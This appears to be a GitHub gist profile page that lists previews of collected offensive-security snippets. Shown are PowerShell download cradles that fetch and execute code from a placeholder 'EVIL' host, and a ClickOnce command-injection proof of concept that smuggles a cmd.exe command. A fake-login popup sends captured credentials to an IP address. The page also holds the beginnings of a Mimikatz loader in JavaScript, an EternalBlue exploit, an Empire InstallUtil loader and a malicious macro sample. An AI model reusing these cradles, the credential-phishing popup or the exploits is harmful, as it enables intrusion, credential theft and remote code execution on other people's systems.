Skip to content

Instantly share code, notes, and snippets.

View 0x4243's full-sized avatar

0x4243

15 followers · 27 following
View GitHub Profile
@0x4243
0x4243 / DownloadCradles.ps1
Created November 9, 2016 12:45 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@0x4243
0x4243 / empire.cs
Created November 9, 2016 14:47
PowerShell Empire via InstallUtil.exe
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
@0x4243
0x4243 / programmatic_poc.cs
Created November 9, 2016 21:48 — forked from Wack0/programmatic_poc.cs
Command injection in MS' One Step / DPLauncher / "Get ready for the Internet" application, for UAC / RCE through social engineering using MS signed exe / clickonce.
using System;
using System.Runtime.InteropServices;
class DPPwned {
[DllImport("dfshim.dll")]
public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);
public static void Main() {
LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);
@0x4243
0x4243 / Invoke-Kerberoast.ps1
Created November 9, 2016 21:50
Get Kerberoastable SPNs
<#
Invoke-Kerberoast.ps1
Author: Will Schroeder (@harmj0y), @machosec
License: BSD 3-Clause
Required Dependencies: None
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast).
Note: the primary method of use will be Invoke-Kerberoast with various targeting options.
@0x4243
0x4243 / gist:a81861766f9ddc415aa9f6036457b756
Created November 9, 2016 22:00 — forked from anonymous/gist:d0da355e5c21a122866808d37234cd5d
PowerShell malware [posted by @JohnLaTwC]
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
@0x4243
0x4243 / powershellpopup.ps1
Created January 20, 2017 20:17 — forked from mubix/powershellpopup.ps1
Powershell Popups, proxy aware and auth aware
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');
@0x4243
0x4243 / katz.js
Created April 29, 2017 16:45
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,
@0x4243
0x4243 / Wannacrypt0r-FACTSHEET.md
Created May 13, 2017 14:20 — forked from rain-1/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cybereweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

@0x4243
0x4243 / eternalblue_exploit.py
Created May 15, 2017 15:01 — forked from worawit/eternalblue7_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@0x4243
0x4243 / cli.md
Created May 17, 2017 21:28 — forked from phrawzty/2serv.py
simple http server to dump request headers 
$ curl -s -H "X-Something: yeah" localhost:8000 > /dev/null

$ python serv.py
ERROR:root:User-Agent: curl/7.37.1
Host: localhost:8000
Accept: */*
X-Something: yeah